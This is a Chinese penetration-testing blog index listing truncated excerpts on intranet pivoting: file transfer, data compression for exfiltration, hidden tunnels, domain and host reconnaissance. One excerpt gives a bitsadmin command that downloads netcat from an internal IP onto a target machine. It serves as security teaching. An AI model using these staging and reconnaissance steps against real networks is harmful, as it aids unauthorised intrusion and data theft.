内网渗透
BeretSEC
靡不有初,鲜克有终!
展开
-
内网渗透--上传与下载
内网渗透--上传与下载内网渗透–上传与下载使用bitsadmin 进行下载使用powershell 进行下载使用 certutil 进行下载使用 WGET 进行下载内网渗透–上传与下载对于不用直接上传而且只能通过命令行执行的shell,我们可以通过以下的方法对文件进行上传和下载。使用bitsadmin 进行下载下载命令:bitsadmin /transfer n http://172.16.12.128/NC.exe E:\nc.exe使用powershell 进行下载本地下载:power原创 2020-11-30 18:17:27 · 1161 阅读 · 0 评论 -
内网渗透--压缩数据
内网渗透--压缩数据使用WinRAR 工具进行解压缩1、以RAR 格式压缩/解压2、分卷压缩/解压使用7-Zip 工具进行解压缩1、普通压缩解压方式2、分卷压缩/解压方式在渗透测试中,数据的下载也是重要的一部分,通常我们使用winrar、7-zip 进行压缩数据而后进行下载。使用WinRAR 工具进行解压缩 目标机器上安装了 WinRAR,可以直接使用;如果没有安装,可以在本地下载并安装,然后把 WinRAR安装目录里的 rar.exe文件提取出来,上传到目标机器中(安装 WinRAR的原创 2020-11-30 18:12:24 · 661 阅读 · 0 评论 -
内网渗透--建立隐藏通信隧道
内网渗透--建立隐藏通信隧道原创 2020-11-30 18:08:09 · 373 阅读 · 0 评论 -
隐藏通信隧道-判断内网连通性
隐藏通信隧道-判断内网连通性完成内网信息收集后,我们需要判断流量是否出得去,进得来。隐藏通信隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输。判断内外的连通性是指判断机器能否上外网等。要综合判断各种协议(TCP、HTTP、DNS、ICMP等)及端口通信等情况。常见的允许流量流出的端口有80、8080、443、53、110、123等。—-《内网安全攻防–渗透测试实战指南》1、ICMP 协议使用ping 命令进行探测:ping <ip地址或者域名>原创 2020-10-29 17:30:12 · 359 阅读 · 0 评论 -
信息收集--域内信息收集
域内信息收集一、收集域内基础信息1.查询域2.查询此域内所有计算机3.查询域内所有用户组列表4.查询所有域成员计算机列表5.获取域密码信息6.获取域信任信息二、查找域控制器1.查看域内控制器的机器名2.查看域控制器的主机名3.查看当前时间4.查看域控制器组三、获取域内的用户和管理员信息1.查询所有域用户列表2.查询域管理员用户组四、定位域管理员1.常用域管理员定位工具五、查找域管理进程1.本机检查2. 查询域控制器的域用户会话3. 扫描远程系统上运行的任务4. 扫描远程系统上 NetBIOS 信息5. 利用原创 2020-10-29 17:25:58 · 2600 阅读 · 0 评论 -
信息收集--端口探测
探测内网端口1.利用 Telnet 命令进行扫描2.利用 S 扫描器3.利用 Metasploit 端口扫描4.PowerSploit 下的 Invoke-portscan.ps1 模块5.Nishang 下的 Invoke-PortScan 模块1.利用 Telnet 命令进行扫描Telnet 协议是 TCP/IP 协议族的一员,是 Internet 远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在使用者计算机上使用 Telnet 程序,可以连接到目标服务器。原创 2020-09-25 16:08:17 · 522 阅读 · 0 评论 -
信息收集--主机存活
信息收集--主机存活探测内网存活主机1.利用 NetBIOS 快速探测内网2.利用 ICMP 协议快速探测内网3.利用 ARP 扫描探测内网4.利用 TCP/UDP 端口扫描探测内网探测内网存活主机内网存活主机的探测是内网渗透中不可或缺的一个环节。在扫描的时候,应尽量避免使用 Namp等工具进行暴力扫描.要尽量使用目标系统自带的各种工具,推荐使用 PowerShell 脚本。对于 Windows 7以下版本的系统,可以使用 VBS 脚本。在探测时,可在白天和夜间分别探测,以对比分析存活主机和对应的 I原创 2020-09-25 16:03:34 · 551 阅读 · 0 评论 -
信息收集--判断是否有域
信息收集–判断是否有域搜集完本机相关信息后,接下来,就要判断当前内网是否有域。如果有,需要判断所控主机是否在域内。1.使用 ipconfig 命令使用以下命令,查看网关 IP 地址、DNS 的 IP 地址、本地地址是否和 DNS 服务器为同一网段、域名等.C:\Windows\Temp>ipconfig /allWindows IP 配置主机名 . . . . . . . . . . . . . : Srv-DB-0day主 DNS 后缀 . . . . . . . . . . .原创 2020-08-31 09:04:55 · 2423 阅读 · 0 评论 -
信息收集--本机信息
信息收集--本机信息本机信息收集一、手工信息收集1. 查询网络配置信息2.查询操作系统及安装软件的版本信息3.查询本机服务信息4.查询进程列表5.查看启动程序信息6.查看计划任务7.查看主机开机时间8.查询用户列表9.列出或断开本地计算机和连接的客户端的会话10.查询端口列表11.查询补丁列表12.查询本机共享13.查询路由表及所有可用接口的 ARP 缓存表14.查询防火墙相关配置15.查看计算机代理配置情况16.查询并开启远程连接服务17.查询当前权限、账号信息二、自动化信息收集本机信息收集不管是在原创 2020-08-31 08:57:33 · 1219 阅读 · 0 评论